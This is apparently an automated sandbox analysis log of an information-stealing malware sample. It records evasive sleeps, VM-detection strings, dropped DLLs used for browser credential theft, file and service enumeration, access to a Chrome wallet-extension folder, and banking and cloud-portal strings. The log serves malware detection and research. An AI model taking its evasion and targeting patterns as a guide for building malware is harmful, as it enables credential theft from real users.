Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to enumerate running services

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,

23_2_00007FFDA38C7694

Contains functionality to query network adapater information

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDA38960C8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDA38CB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0A2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0D30A8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC0F4978
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFDAC121D98

Found dropped PE file which has not been started or loaded

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found evasive API chain (date check)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616	Thread sleep time: -6180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5140	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3756	Thread sleep count: 58 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1112	Thread sleep count: 52 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7132	Thread sleep count: 41 > 30

Queries keyboard layouts

Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\ProgramData\BFCAAEHJDB.exe	Last function: Thread delayed
Source: C:\ProgramData\BFCAAEHJDB.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401110
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004099F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004156C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,	0_2_00414F80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00409D40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_00415A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,	23_2_00007FFDAC122FE3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

0_2_004153C0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040FDA0 GetSystemInfo,wsprintfA,

0_2_0040FDA0

Source: C:\ProgramData\BFCAAEHJDB.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: main.exe, 00000017.00000002.3440076438.000001E397F57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareTZ
